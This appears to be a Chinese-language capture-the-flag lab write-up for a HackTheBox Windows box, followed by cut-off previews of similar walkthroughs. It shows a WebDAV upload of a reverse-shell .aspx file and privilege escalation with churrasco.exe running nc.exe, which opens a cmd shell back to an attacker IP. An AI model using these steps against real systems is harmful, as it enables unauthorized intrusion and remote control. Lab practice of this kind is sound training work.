nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.188 (扫描TCP)
发现有webdav可以利用
davtest -url http://10.10.16.43 ----可以查看到哪些后缀可以进行上传
cadaver http://10.10.16.43
put reverse_shell.txt
move reverse_shell.txt reverse_shell.aspx
然后上传反弹SHELL挡案
然后提权systeminfo
C:\Inetpub\wwwroot\churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe -nv 10.10.16.43 4445 -e cmd"
名称说明靶机下载链接https://www.vulnhub.com/entry/raven-2,269/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.188 (扫描TCP)http都没有查看到可以利用的点这边直接是看看orcal的漏...
名称说明靶机下载链接https://www.vulnhub.com/entry/goldeneye-1,240/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....
OSCP备考_0x54_HackThBox靶机_Windows_remotenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.230.172&nbs...
名称说明靶机下载链接https://www.vulnhub.com/entry/pwnlab-init,158/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....
信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.143.34 (扫描TCP)nmap -sU --top-ports 100 10.129...
